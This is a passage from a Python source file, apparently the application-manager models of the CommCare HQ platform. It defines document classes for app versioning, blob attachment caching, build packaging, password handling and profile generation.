header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = ShadowModule(
name={(lang or 'en'): name or ugettext("Untitled Module")},
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
)
module.get_or_create_unique_id()
return module
def validate_for_build(self):
errors = super(ShadowModule, self).validate_for_build()
errors += self.validate_details_for_build()
if not self.source_module:
errors.append({
'type': 'no source module id',
'module': self.get_module_info()
})
return errors
class LazyBlobDoc(BlobMixin):
"""LazyAttachmentDoc for blob db
Cache blobs in local memory (for this request)
and in django cache (for the next few requests)
and commit to couchdb.
See also `dimagi.utils.couch.lazy_attachment_doc.LazyAttachmentDoc`
Cache strategy:
- on fetch, check in local memory, then cache
- if both are a miss, fetch from couchdb and store in both
- after an attachment is committed to the blob db and the
save save has succeeded, save the attachment in the cache
"""
migrating_blobs_from_couch = True
def __init__(self, *args, **kwargs):
super(LazyBlobDoc, self).__init__(*args, **kwargs)
self._LAZY_ATTACHMENTS = {}
# to cache fetched attachments
# these we do *not* send back down upon save
self._LAZY_ATTACHMENTS_CACHE = {}
@classmethod
def wrap(cls, data):
if "_attachments" in data:
data = data.copy()
attachments = data.pop("_attachments").copy()
if cls.migrating_blobs_from_couch:
# preserve stubs so couch attachments don't get deleted on save
stubs = {}
for name, value in list(attachments.items()):
if isinstance(value, dict) and "stub" in value:
stubs[name] = attachments.pop(name)
if stubs:
data["_attachments"] = stubs
else:
attachments = None
self = super(LazyBlobDoc, cls).wrap(data)
if attachments:
for name, attachment in attachments.items():
if isinstance(attachment, basestring):
info = {"content": attachment}
else:
raise ValueError("Unknown attachment format: {!r}"
.format(attachment))
self.lazy_put_attachment(name=name, **info)
return self
def __attachment_cache_key(self, name):
return u'lazy_attachment/{id}/{name}'.format(id=self.get_id, name=name)
def __set_cached_attachment(self, name, content):
cache.set(self.__attachment_cache_key(name), content, timeout=60 * 60 * 24)
self._LAZY_ATTACHMENTS_CACHE[name] = content
def __get_cached_attachment(self, name):
try:
# it has been fetched already during this request
content = self._LAZY_ATTACHMENTS_CACHE[name]
except KeyError:
content = cache.get(self.__attachment_cache_key(name))
if content is not None:
self._LAZY_ATTACHMENTS_CACHE[name] = content
return content
def put_attachment(self, content, name=None, *args, **kw):
cache.delete(self.__attachment_cache_key(name))
self._LAZY_ATTACHMENTS_CACHE.pop(name, None)
return super(LazyBlobDoc, self).put_attachment(content, name, *args, **kw)
def lazy_put_attachment(self, content, name=None, content_type=None,
content_length=None):
"""
Ensure the attachment is available through lazy_fetch_attachment
and that upon self.save(), the attachments are put to the doc as well
"""
self._LAZY_ATTACHMENTS[name] = {
'content': content,
'content_type': content_type,
'content_length': content_length,
}
def lazy_fetch_attachment(self, name):
# it has been put/lazy-put already during this request
if name in self._LAZY_ATTACHMENTS:
content = self._LAZY_ATTACHMENTS[name]['content']
else:
content = self.__get_cached_attachment(name)
if content is None:
try:
content = self.fetch_attachment(name)
except ResourceNotFound as e:
# django cache will pickle this exception for you
# but e.response isn't picklable
if hasattr(e, 'response'):
del e.response
content = e
raise
finally:
self.__set_cached_attachment(name, content)
if isinstance(content, ResourceNotFound):
raise content
return content
def lazy_list_attachments(self):
keys = set()
keys.update(getattr(self, '_LAZY_ATTACHMENTS', None) or {})
keys.update(self.blobs or {})
return keys
def save(self, **params):
def super_save():
super(LazyBlobDoc, self).save(**params)
if self._LAZY_ATTACHMENTS:
with self.atomic_blobs(super_save):
for name, info in self._LAZY_ATTACHMENTS.items():
if not info['content_type']:
info['content_type'] = ';'.join(filter(None, guess_type(name)))
super(LazyBlobDoc, self).put_attachment(name=name, **info)
# super_save() has succeeded by now
for name, info in self._LAZY_ATTACHMENTS.items():
self.__set_cached_attachment(name, info['content'])
self._LAZY_ATTACHMENTS.clear()
else:
super_save()
class VersionedDoc(LazyBlobDoc):
"""
A document that keeps an auto-incrementing version number, knows how to make copies of itself,
delete a copy of itself, and revert back to an earlier copy of itself.
"""
domain = StringProperty()
copy_of = StringProperty()
version = IntegerProperty()
short_url = StringProperty()
short_odk_url = StringProperty()
short_odk_media_url = StringProperty()
_meta_fields = ['_id', '_rev', 'domain', 'copy_of', 'version', 'short_url', 'short_odk_url', 'short_odk_media_url']
@property
def id(self):
return self._id
def save(self, response_json=None, increment_version=None, **params):
if increment_version is None:
increment_version = not self.copy_of
if increment_version:
self.version = self.version + 1 if self.version else 1
super(VersionedDoc, self).save(**params)
if response_json is not None:
if 'update' not in response_json:
response_json['update'] = {}
response_json['update']['app-version'] = self.version
def make_build(self):
assert self.get_id
assert self.copy_of is None
cls = self.__class__
copies = cls.view('app_manager/applications', key=[self.domain, self._id, self.version], include_docs=True, limit=1).all()
if copies:
copy = copies[0]
else:
copy = deepcopy(self.to_json())
bad_keys = ('_id', '_rev', '_attachments', 'external_blobs',
'short_url', 'short_odk_url', 'short_odk_media_url', 'recipients')
for bad_key in bad_keys:
if bad_key in copy:
del copy[bad_key]
copy = cls.wrap(copy)
copy['copy_of'] = self._id
copy.copy_attachments(self)
return copy
def copy_attachments(self, other, regexp=ATTACHMENT_REGEX):
for name in other.lazy_list_attachments() or {}:
if regexp is None or re.match(regexp, name):
self.lazy_put_attachment(other.lazy_fetch_attachment(name), name)
def make_reversion_to_copy(self, copy):
"""
Replaces couch doc with a copy of the backup ("copy").
Returns the another Application/RemoteApp referring to this
updated couch doc. The returned doc should be used in place of
the original doc, i.e. should be called as follows:
app = app.make_reversion_to_copy(copy)
app.save()
"""
if copy.copy_of != self._id:
raise VersioningError("%s is not a copy of %s" % (copy, self))
app = deepcopy(copy.to_json())
app['_rev'] = self._rev
app['_id'] = self._id
app['version'] = self.version
app['copy_of'] = None
app.pop('_attachments', None)
app.pop('external_blobs', None)
cls = self.__class__
app = cls.wrap(app)
app.copy_attachments(copy)
return app
def delete_copy(self, copy):
if copy.copy_of != self._id:
raise VersioningError("%s is not a copy of %s" % (copy, self))
copy.delete_app()
copy.save(increment_version=False)
def scrub_source(self, source):
"""
To be overridden.
Use this to scrub out anything
that should be shown in the
application source, such as ids, etc.
"""
return source
def export_json(self, dump_json=True):
source = deepcopy(self.to_json())
for field in self._meta_fields:
if field in source:
del source[field]
_attachments = {}
for name in self.lazy_list_attachments():
if re.match(ATTACHMENT_REGEX, name):
# FIXME loss of metadata (content type, etc.)
_attachments[name] = self.lazy_fetch_attachment(name)
# the '_attachments' value is a dict of `name: blob_content`
# pairs, and is part of the exported (serialized) app interface
source['_attachments'] = _attachments
source.pop("external_blobs", None)
source = self.scrub_source(source)
return json.dumps(source) if dump_json else source
@classmethod
def from_source(cls, source, domain):
for field in cls._meta_fields:
if field in source:
del source[field]
source['domain'] = domain
app = cls.wrap(source)
return app
def is_deleted(self):
return self.doc_type.endswith(DELETED_SUFFIX)
def unretire(self):
self.doc_type = self.get_doc_type()
self.save()
def get_doc_type(self):
if self.doc_type.endswith(DELETED_SUFFIX):
return self.doc_type[:-len(DELETED_SUFFIX)]
else:
return self.doc_type
def absolute_url_property(method):
"""
Helper for the various fully qualified application URLs
Turns a method returning an unqualified URL
into a property returning a fully qualified URL
(e.g., '/my_url/' => 'https://www.commcarehq.org/my_url/')
Expects `self.url_base` to be fully qualified url base
"""
@wraps(method)
def _inner(self):
return "%s%s" % (self.url_base, method(self))
return property(_inner)
class BuildProfile(DocumentSchema):
name = StringProperty()
langs = StringListProperty()
def __eq__(self, other):
return self.langs == other.langs
def __ne__(self, other):
return not self.__eq__(other)
class MediaList(DocumentSchema):
media_refs = StringListProperty()
class ApplicationBase(VersionedDoc, SnapshotMixin,
CommCareFeatureSupportMixin,
CommentMixin):
"""
Abstract base class for Application and RemoteApp.
Contains methods for generating the various files and zipping them into CommCare.jar
See note at top of file for high-level overview.
"""
recipients = StringProperty(default="")
# this is the supported way of specifying which commcare build to use
build_spec = SchemaProperty(BuildSpec)
platform = StringProperty(
choices=["nokia/s40", "nokia/s60", "winmo", "generic"],
default="nokia/s40"
)
text_input = StringProperty(
choices=['roman', 'native', 'custom-keys', 'qwerty'],
default="roman"
)
# The following properties should only appear on saved builds
# built_with stores a record of CommCare build used in a saved app
built_with = SchemaProperty(BuildRecord)
build_signed = BooleanProperty(default=True)
built_on = DateTimeProperty(required=False)
build_comment = StringProperty()
comment_from = StringProperty()
build_broken = BooleanProperty(default=False)
# not used yet, but nice for tagging/debugging
# currently only canonical value is 'incomplete-build',
# for when build resources aren't found where they should be
build_broken_reason = StringProperty()
# watch out for a past bug:
# when reverting to a build that happens to be released
# that got copied into into the new app doc, and when new releases were made,
# they were automatically starred
# AFAIK this is fixed in code, but my rear its ugly head in an as-yet-not-understood
# way for apps that already had this problem. Just keep an eye out
is_released = BooleanProperty(default=False)
# django-style salted hash of the admin password
admin_password = StringProperty()
# a=Alphanumeric, n=Numeric, x=Neither (not allowed)
admin_password_charset = StringProperty(choices=['a', 'n', 'x'], default='n')
# This is here instead of in Application because it needs to be available in stub representation
application_version = StringProperty(default=APP_V2, choices=[APP_V1, APP_V2], required=False)
langs = StringListProperty()
secure_submissions = BooleanProperty(default=False)
# metadata for data platform
amplifies_workers = StringProperty(
choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
default=AMPLIFIES_NOT_SET
)
amplifies_project = StringProperty(
choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
default=AMPLIFIES_NOT_SET
)
minimum_use_threshold = StringProperty(
default='15'
)
experienced_threshold = StringProperty(
default='3'
)
# exchange properties
cached_properties = DictProperty()
description = StringProperty()
deployment_date = DateTimeProperty()
phone_model = StringProperty()
user_type = StringProperty()
attribution_notes = StringProperty()
# always false for RemoteApp
case_sharing = BooleanProperty(default=False)
vellum_case_management = BooleanProperty(default=False)
build_profiles = SchemaDictProperty(BuildProfile)
# each language is a key and the value is a list of multimedia referenced in that language
media_language_map = SchemaDictProperty(MediaList)
use_j2me_endpoint = BooleanProperty(default=False)
# Whether or not the Application has had any forms submitted against it
has_submissions = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
should_save = False
# scrape for old conventions and get rid of them
if 'commcare_build' in data:
version, build_number = data['commcare_build'].split('/')
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_build']
if 'commcare_tag' in data:
version, build_number = current_builds.TAG_MAP[data['commcare_tag']]
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_tag']
if data.has_key("built_with") and isinstance(data['built_with'], basestring):
data['built_with'] = BuildSpec.from_string(data['built_with']).to_json()
if 'native_input' in data:
if 'text_input' not in data:
data['text_input'] = 'native' if data['native_input'] else 'roman'
del data['native_input']
if 'build_langs' in data:
if data['build_langs'] != data['langs'] and 'build_profiles' not in data:
data['build_profiles'] = {
uuid.uuid4().hex: dict(
name=', '.join(data['build_langs']),
langs=data['build_langs']
)
}
should_save = True
del data['build_langs']
if data.has_key('original_doc'):
data['copy_history'] = [data.pop('original_doc')]
should_save = True
data["description"] = data.get('description') or data.get('short_description')
self = super(ApplicationBase, cls).wrap(data)
if not self.build_spec or self.build_spec.is_null():
self.build_spec = get_default_build_spec(self.application_version)
if should_save:
self.save()
return self
def rename_lang(self, old_lang, new_lang):
validate_lang(new_lang)
def is_remote_app(self):
return False
def get_latest_app(self, released_only=True):
if released_only:
return get_app(self.domain, self.get_id, latest=True)
else:
return self.view('app_manager/applications',
startkey=[self.domain, self.get_id, {}],
endkey=[self.domain, self.get_id],
include_docs=True,
limit=1,
descending=True,
).first()
@memoized
def get_latest_saved(self):
"""
This looks really similar to get_latest_app, not sure why tim added
"""
doc = (get_latest_released_app_doc(self.domain, self._id) or
get_latest_build_doc(self.domain, self._id))
return self.__class__.wrap(doc) if doc else None
def set_admin_password(self, raw_password):
salt = os.urandom(5).encode('hex')
self.admin_password = make_password(raw_password, salt=salt)
if raw_password.isnumeric():
self.admin_password_charset = 'n'
elif raw_password.isalnum():
self.admin_password_charset = 'a'
else:
self.admin_password_charset = 'x'
def check_password_charset(self):
errors = []
if hasattr(self, 'profile'):
password_format = self.profile.get('properties', {}).get('password_format', 'n')
message = ('Your app requires {0} passwords '
'but the admin password is not {0}')
if password_format == 'n' and self.admin_password_charset in 'ax':
errors.append({'type': 'password_format',
'message': message.format('numeric')})
if password_format == 'a' and self.admin_password_charset in 'x':
errors.append({'type': 'password_format',
'message': message.format('alphanumeric')})
return errors
def get_build(self):
return self.build_spec.get_build()
@property
def build_version(self):
# `LooseVersion`s are smart!
# LooseVersion('2.12.0') > '2.2'
# (even though '2.12.0' < '2.2')
if self.build_spec.version:
return LooseVersion(self.build_spec.version)
@property
def commcare_minor_release(self):
"""This is mostly just for views"""
return '%d.%d' % self.build_spec.minor_release()
@property
def short_name(self):
return self.name if len(self.name) <= 12 else '%s..' % self.name[:10]
@property
def has_careplan_module(self):
return False
@property
def url_base(self):
custom_base_url = getattr(self, 'custom_base_url', None)
return custom_base_url or get_url_base()
@absolute_url_property
def post_url(self):
if self.secure_submissions:
url_name = 'receiver_secure_post_with_app_id'
else:
url_name = 'receiver_post_with_app_id'
return reverse(url_name, args=[self.domain, self.get_id])
@absolute_url_property
def key_server_url(self):
return reverse('key_server_url', args=[self.domain])
@absolute_url_property
def ota_restore_url(self):
return reverse('app_aware_restore', args=[self.domain, self._id])
@absolute_url_property
def form_record_url(self):
return '/a/%s/api/custom/pact_formdata/v1/' % self.domain
@absolute_url_property
def hq_profile_url(self):
# RemoteApp already has a property called "profile_url",
# Application.profile_url just points here to stop the conflict
# http://manage.dimagi.com/default.asp?227088#1149422
return "%s?latest=true" % (
reverse('download_profile', args=[self.domain, self._id])
)
@absolute_url_property
def media_profile_url(self):
return "%s?latest=true" % (
reverse('download_media_profile', args=[self.domain, self._id])
)
@property
def profile_loc(self):
return "jr://resource/profile.xml"
@absolute_url_property
def jar_url(self):
return reverse('corehq.apps.app_manager.views.download_jar', args=[self.domain, self._id])
def get_jar_path(self):
spec = {
'nokia/s40': 'Nokia/S40',
'nokia/s60': 'Nokia/S60',
'generic': 'Generic/Default',
'winmo': 'Native/WinMo'
}[self.platform]
if self.platform in ('nokia/s40', 'nokia/s60'):
spec += {
('native',): '-native-input',
('roman',): '-generic',
('custom-keys',): '-custom-keys',
('qwerty',): '-qwerty'
}[(self.text_input,)]
return spec
def get_jadjar(self):
return self.get_build().get_jadjar(self.get_jar_path(), self.use_j2me_endpoint)
def validate_fixtures(self):
if not domain_has_privilege(self.domain, privileges.LOOKUP_TABLES):
# remote apps don't support get_forms yet.
# for now they can circumvent the fixture limitation. sneaky bastards.
if hasattr(self, 'get_forms'):
for form in self.get_forms():
if form.has_fixtures:
raise PermissionDenied(_(
"Usage of lookup tables is not supported by your "
"current subscription. Please upgrade your "
"subscription before using this feature."
))
def validate_intents(self):
if domain_has_privilege(self.domain, privileges.CUSTOM_INTENTS):
return
if hasattr(self, 'get_forms'):
for form in self.get_forms():
intents = form.wrapped_xform().odk_intents
if intents:
if not domain_has_privilege(self.domain, privileges.TEMPLATED_INTENTS):
raise PermissionDenied(_(
"Usage of integrations is not supported by your "
"current subscription. Please upgrade your "
"subscription before using this feature."
))
else:
templates = next(app_callout_templates)
if len(set(intents) - set(t['id'] for t in templates)):
raise PermissionDenied(_(
"Usage of external integration is not supported by your "
"current subscription. Please upgrade your "
"subscription before using this feature."
))
def validate_jar_path(self):
build = self.get_build()
setting = commcare_settings.get_commcare_settings_lookup()['hq']['text_input']
value = self.text_input
setting_version = setting['since'].get(value)
if setting_version:
setting_version = tuple(map(int, setting_version.split('.')))
my_version = build.minor_release()
if my_version < setting_version:
i = setting['values'].index(value)
assert i != -1
name = _(setting['value_names'][i])
raise AppEditingError((
'%s Text Input is not supported '
'in CommCare versions before %s.%s. '
'(You are using %s.%s)'
) % ((name,) + setting_version + my_version))
@property
def jad_settings(self):
settings = {
'JavaRosa-Admin-Password': self.admin_password,
'Profile': self.profile_loc,
'MIDlet-Jar-URL': self.jar_url,
#'MIDlet-Name': self.name,
# e.g. 2011-Apr-11 20:45
'CommCare-Release': "true",
}
if self.build_version < '2.8':
settings['Build-Number'] = self.version
return settings
def create_build_files(self, save=False, build_profile_id=None):
built_on = datetime.datetime.utcnow()
all_files = self.create_all_files(build_profile_id)
if save:
self.built_on = built_on
self.built_with = BuildRecord(
version=self.build_spec.version,
build_number=self.version,
datetime=built_on,
)
for filepath in all_files:
self.lazy_put_attachment(all_files[filepath],
'files/%s' % filepath)
def create_jadjar_from_build_files(self, save=False):
self.validate_jar_path()
with CriticalSection(['create_jadjar_' + self._id]):
try:
return (
self.lazy_fetch_attachment('CommCare.jad'),
self.lazy_fetch_attachment('CommCare.jar'),
)
except (ResourceError, KeyError):
all_files = {
filename[len('files/'):]: self.lazy_fetch_attachment(filename)
for filename in self.blobs if filename.startswith('files/')
}
all_files = {
name: (contents if isinstance(contents, str) else contents.encode('utf-8'))
for name, contents in all_files.items()
}
release_date = self.built_with.datetime or datetime.datetime.utcnow()
jad_settings = {
'Released-on': release_date.strftime("%Y-%b-%d %H:%M"),
}
jad_settings.update(self.jad_settings)
jadjar = self.get_jadjar().pack(all_files, jad_settings)
if save:
self.lazy_put_attachment(jadjar.jad, 'CommCare.jad')
self.lazy_put_attachment(jadjar.jar, 'CommCare.jar')
self.built_with.signed = jadjar.signed
return jadjar.jad, jadjar.jar
def validate_app(self):
errors = []
errors.extend(self.check_password_charset())
try:
self.validate_fixtures()
self.validate_intents()
self.create_all_files()
except CaseXPathValidationError as cve:
errors.append({
'type': 'invalid case xpath reference',
'module': cve.module,
'form': cve.form,
})
except UserCaseXPathValidationError as ucve:
errors.append({
'type': 'invalid user case xpath reference',
'module': ucve.module,
'form': ucve.form,
})
except (AppEditingError, XFormValidationError, XFormException,
PermissionDenied, SuiteValidationError) as e:
errors.append({'type': 'error', 'message': unicode(e)})
except Exception as e:
if settings.DEBUG:
raise
# this is much less useful/actionable without a URL
# so make sure to include the request
logging.error('Unexpected error building app', exc_info=True,
extra={'request': view_utils.get_request()})
errors.append({'type': 'error', 'message': 'unexpected error: %s' % e})
return errors
@absolute_url_property
def odk_profile_url(self):
return reverse('corehq.apps.app_manager.views.download_odk_profile', args=[self.domain, self._id])
@absolute_url_property
def odk_media_profile_url(self):
return reverse('corehq.apps.app_manager.views.download_odk_media_profile', args=[self.domain, self._id])
@property
def odk_profile_display_url(self):
return self.short_odk_url or self.odk_profile_url
@property
def odk_media_profile_display_url(self):
return self.short_odk_media_url or self.odk_media_profile_url
def get_odk_qr_code(self, with_media=False, build_profile_id=None):
"""Returns a QR code, as a PNG to install on CC-ODK"""
try:
return self.lazy_fetch_attachment("qrcode.png")
except ResourceNotFound:
from pygooglechart import QRChart
HEIGHT = WIDTH = 250
code = QRChart(HEIGHT, WIDTH)
url = self.odk_profile_url if not with_media else self.odk_media_profile_url
if build_profile_id is not None:
url += '?profile={profile_id}'.format(profile_id=build_profile_id)
code.add_data(url)
# "Level L" error correction with a 0 pixel margin
code.set_ec('L', 0)
f, fname = tempfile.mkstemp()
code.download(fname)
os.close(f)
with open(fname, "rb") as f:
png_data = f.read()
self.lazy_put_attachment(png_data, "qrcode.png",
content_type="image/png")
return png_data
def generate_shortened_url(self, url_type, build_profile_id=None):
try:
if settings.BITLY_LOGIN:
view_name = 'corehq.apps.app_manager.views.{}'.format(url_type)
if build_profile_id is not None:
long_url = "{}{}?profile={}".format(
self.url_base, reverse(view_name, args=[self.domain, self._id]), build_profile_id
)
else:
long_url = "{}{}".format(self.url_base, reverse(view_name, args=[self.domain, self._id]))
shortened_url = bitly.shorten(long_url)
else:
shortened_url = None
except Exception:
logging.exception("Problem creating bitly url for app %s. Do you have network?" % self.get_id)
else:
return shortened_url
def get_short_url(self, build_profile_id=None):
if not build_profile_id:
if not self.short_url:
self.short_url = self.generate_shortened_url('download_jad')
self.save()
return self.short_url
else:
return self.generate_shortened_url('download_jad', build_profile_id)
def get_short_odk_url(self, with_media=False, build_profile_id=None):
if not build_profile_id:
if with_media:
if not self.short_odk_media_url:
self.short_odk_media_url = self.generate_shortened_url('download_odk_media_profile')
self.save()
return self.short_odk_media_url
else:
if not self.short_odk_url:
self.short_odk_url = self.generate_shortened_url('download_odk_profile')
self.save()
return self.short_odk_url
else:
if with_media:
return self.generate_shortened_url('download_odk_media_profile', build_profile_id)
else:
return self.generate_shortened_url('download_odk_profile', build_profile_id)
def fetch_jar(self):
return self.get_jadjar().fetch_jar()
def make_build(self, comment=None, user_id=None, previous_version=None):
copy = super(ApplicationBase, self).make_build()
if not copy._id:
# I expect this always to be the case
# but check explicitly so as not to change the _id if it exists
copy._id = copy.get_db().server.next_uuid()
force_new_forms = False
if previous_version and self.build_profiles != previous_version.build_profiles:
force_new_forms = True
copy.set_form_versions(previous_version, force_new_forms)
copy.set_media_versions(previous_version)
copy.create_build_files(save=True)
# since this hard to put in a test
# I'm putting this assert here if copy._id is ever None
# which makes tests error
assert copy._id
copy.build_comment = comment
copy.comment_from = user_id
if user_id:
user = CouchUser.get(user_id)
if not user.has_built_app:
user.has_built_app = True
user.save()
copy.is_released = False
if not copy.is_remote_app():
copy.update_mm_map()
return copy
def delete_app(self):
domain_has_apps.clear(self.domain)
self.doc_type += '-Deleted'
record = DeleteApplicationRecord(
domain=self.domain,
app_id=self.id,
datetime=datetime.datetime.utcnow()
)
record.save()
return record
def save(self, response_json=None, increment_version=None, **params):
if not self._rev and not domain_has_apps(self.domain):
domain_has_apps.clear(self.domain)
super(ApplicationBase, self).save(
response_json=response_json, increment_version=increment_version, **params)
def set_form_versions(self, previous_version, force_new_version=False):
# by default doing nothing here is fine.
pass
def set_media_versions(self, previous_version):
pass
def update_mm_map(self):
if self.build_profiles and domain_has_privilege(self.domain, privileges.BUILD_PROFILES):
for lang in self.langs:
self.media_language_map[lang] = MediaList()
for form in self.get_forms():
xml = form.wrapped_xform()
for lang in self.langs:
media = []
for path in xml.all_media_references(lang):
if path is not None:
media.append(path)
map_item = self.multimedia_map.get(path)
#dont break if multimedia is missing
if map_item:
map_item.form_media = True
self.media_language_map[lang].media_refs.extend(media)
else:
self.media_language_map = {}
def get_build_langs(self, build_profile_id=None):
if build_profile_id is not None:
return self.build_profiles[build_profile_id].langs
else:
return self.langs
def validate_lang(lang):
if not re.match(r'^[a-z]{2,3}(-[a-z]*)?$', lang):
raise ValueError("Invalid Language")
def validate_property(property):
"""
Validate a case property name
>>> validate_property('parent/maternal-grandmother_fullName')
>>> validate_property('foo+bar')
Traceback (most recent call last):
...
ValueError: Invalid Property
"""
# this regex is also copied in propertyList.ejs
if not re.match(r'^[a-zA-Z][\w_-]*(/[a-zA-Z][\w_-]*)*$', property):
raise ValueError("Invalid Property")
def validate_detail_screen_field(field):
# If you change here, also change here:
# corehq/apps/app_manager/static/app_manager/js/detail-screen-config.js
field_re = r'^([a-zA-Z][\w_-]*:)*([a-zA-Z][\w_-]*/)*#?[a-zA-Z][\w_-]*$'
if not re.match(field_re, field):
raise ValueError("Invalid Sort Field")
class SavedAppBuild(ApplicationBase):
def to_saved_build_json(self, timezone):
data = super(SavedAppBuild, self).to_json().copy()
for key in ('modules', 'user_registration', 'external_blobs',
'_attachments', 'profile', 'translations'
'description', 'short_description'):
data.pop(key, None)
built_on_user_time = ServerTime(self.built_on).user_time(timezone)
data.update({
'id': self.id,
'built_on_date': built_on_user_time.ui_string(USER_DATE_FORMAT),
'built_on_time': built_on_user_time.ui_string(USER_TIME_FORMAT),
'menu_item_label': self.built_with.get_menu_item_label(),
'jar_path': self.get_jar_path(),
'short_name': self.short_name,
'enable_offline_install': self.enable_offline_install,
})
comment_from = data['comment_from']
if comment_from:
try:
comment_user = CouchUser.get(comment_from)
except ResourceNotFound:
data['comment_user_name'] = comment_from
else:
data['comment_user_name'] = comment_user.full_name
return data
class Application(ApplicationBase, TranslationMixin, HQMediaMixin):
"""
An Application that can be created entirely through the online interface
"""
modules = SchemaListProperty(ModuleBase)
name = StringProperty()
# profile's schema is {'features': {}, 'properties': {}, 'custom_properties': {}}
# ended up not using a schema because properties is a reserved word
profile = DictProperty()
use_custom_suite = BooleanProperty(default=False)
custom_base_url = StringProperty()
cloudcare_enabled = BooleanProperty(default=False)
translation_strategy = StringProperty(default='select-known',
choices=app_strings.CHOICES.keys())
commtrack_requisition_mode = StringProperty(choices=CT_REQUISITION_MODES)
auto_gps_capture = BooleanProperty(default=False)
created_from_template = StringProperty()
use_grid_menus = BooleanProperty(default=False)
@property
@memoized
def commtrack_enabled(self):
if settings.UNIT_TESTING:
return False # override with .tests.util.commtrack_enabled
domain_obj = Domain.get_by_name(self.domain) if self.domain else None
return domain_obj.commtrack_enabled if domain_obj else False
@classmethod
def wrap(cls, data):
for module in data.get('modules', []):
for attr in ('case_label', 'referral_label'):
if not module.has_key(attr):
module[attr] = {}
for lang in data['langs']:
if not module['case_label'].get(lang):
module['case_label'][lang] = commcare_translations.load_translations(lang).get('cchq.case', 'Cases')
if not module['referral_label'].get(lang):
module['referral_label'][lang] = commcare_translations.load_translations(lang).get('cchq.referral', 'Referrals')
data.pop('commtrack_enabled', None) # Remove me after migrating apps
self = super(Application, cls).wrap(data)
# make sure all form versions are None on working copies
if not self.copy_of:
for form in self.get_forms():
form.version = None
# weird edge case where multimedia_map gets set to null and causes issues
if self.multimedia_map is None:
self.multimedia_map = {}
return self
def save(self, *args, **kwargs):
super(Application, self).save(*args, **kwargs)
# Import loop if this is imported at the top
# TODO: revamp so signal_connections <- models <- signals
from corehq.apps.app_manager import signals
signals.app_post_save.send(Application, application=self)
def make_reversion_to_copy(self, copy):
app = super(Application, self).make_reversion_to_copy(copy)
for form in app.get_forms():
# reset the form's validation cache, since the form content is
# likely to have changed in the revert!
form.validation_cache = None
form.version = None
app.build_broken = False
return app
@property
def profile_url(self):
return self.hq_profile_url
@absolute_url_property
def suite_url(self):
return reverse('download_suite', args=[self.domain, self.get_id])
@property
def suite_loc(self):
if self.enable_relative_suite_path:
return './suite.xml'
else:
return "jr://resource/suite.xml"
@absolute_url_property
def media_suite_url(self):
return reverse('download_media_suite', args=[self.domain, self.get_id])
@property
def media_suite_loc(self):
if self.enable_relative_suite_path:
return "./media_suite.xml"
else:
return "jr://resource/media_suite.xml"
@property
def default_language(self):
return self.langs[0] if len(self.langs) > 0 else "en"
def fetch_xform(self, module_id=None, form_id=None, form=None, build_profile_id=None):
if not form:
form = self.get_module(module_id).get_form(form_id)
return form.validate_form().render_xform(build_profile_id).encode('utf-8')
def set_form_versions(self, previous_version, force_new_version=False):
"""
Set the 'version' property on each form as follows to the current app version if the form is new
or has changed since the last build. Otherwise set it to the version from the last build.
"""
def _hash(val):
return hashlib.md5(val).hexdigest()
if previous_version:
for form_stuff in self.get_forms(bare=False):
filename = 'files/%s' % self.get_form_filename(**form_stuff)
form = form_stuff["form"]
if not force_new_version:
form_version = None
try:
previous_form = previous_version.get_form(form.unique_id)
# take the previous version's compiled form as-is
# (generation code may have changed since last build)
previous_source = previous_version.fetch_attachment(filename)
except (ResourceNotFound, FormNotFoundException):
pass
else:
previous_hash = _hash(previous_source)
# hack - temporarily set my version to the previous version
# so that that's not treated as the diff
previous_form_version = previous_form.get_version()
form.version = previous_form_version
my_hash = _hash(self.fetch_xform(form=form))
if previous_hash == my_hash:
form_version = previous_form_version
if form_version is None:
form.version = None
else:
form.version = form_version
else:
form.version = None
def set_media_versions(self, previous_version):
"""
Set the media version numbers for all media in the app to the current app version
if the media is new or has changed since the last build. Otherwise set it to the
version from the last build.
"""
# access to .multimedia_map is slow
prev_multimedia_map = previous_version.multimedia_map if previous_version else {}
for path, map_item in self.multimedia_map.iteritems():
prev_map_item = prev_multimedia_map.get(path, None)
if prev_map_item and prev_map_item.unique_id:
# Re-use the id so CommCare knows it's the same resource
map_item.unique_id = prev_map_item.unique_id
if (prev_map_item and prev_map_item.version
and prev_map_item.multimedia_id == map_item.multimedia_id):
map_item.version = prev_map_item.version
else:
map_item.version = self.version
def ensure_module_unique_ids(self, should_save=False):
"""
Creates unique_ids for modules that don't have unique_id attributes
should_save: the doc will be saved only if should_save is set to True
WARNING: If called on the same doc in different requests without saving,
this function will set different uuid each time,
likely causing unexpected behavior
"""
if any(not mod.unique_id for mod in self.modules):
for mod in self.modules:
mod.get_or_create_unique_id()
if should_save:
self.save()
def create_app_strings(self, lang, build_profile_id=None):
gen = app_strings.CHOICES[self.translation_strategy]
if lang == 'default':
return gen.create_default_app_strings(self, build_profile_id)
else:
return gen.create_app_strings(self, lang)
@property
def skip_validation(self):
properties = (self.profile or {}).get('properties', {})
return properties.get('cc-content-valid', 'yes')
@property
def jad_settings(self):
s = super(Application, self).jad_settings
s.update({
'Skip-Validation': self.skip_validation,
})
return s
def create_profile(self, is_odk=False, with_media=False,
template='app_manager/profile.xml', build_profile_id=None):
self__profile = self.profile
app_profile = defaultdict(dict)
for setting in commcare_settings.get_custom_commcare_settings():
setting_type = setting['type']
setting_id = setting['id']
if setting_type not in ('properties', 'features'):
setting_value = None
elif setting_id not in self__profile.get(setting_type, {}):
if 'commcare_default' in setting and setting['commcare_default'] != setting['default']:
setting_value = setting['default']
else:
setting_value = None
else:
setting_value = self__profile[setting_type][setting_id]
if setting_value:
app_profile[setting_type][setting_id] = {
'value': setting_value,
'force': setting.get('force', False)
}
# assert that it gets explicitly set once per loop
del setting_value
if self.case_sharing:
app_profile['properties']['server-tether'] = {
'force': True,
'value': 'sync',
}
logo_refs = [logo_name for logo_name in self.logo_refs if logo_name in ANDROID_LOGO_PROPERTY_MAPPING]
if logo_refs and domain_has_privilege(self.domain, privileges.COMMCARE_LOGO_UPLOADER):
for logo_name in logo_refs:
app_profile['properties'][ANDROID_LOGO_PROPERTY_MAPPING[logo_name]] = {
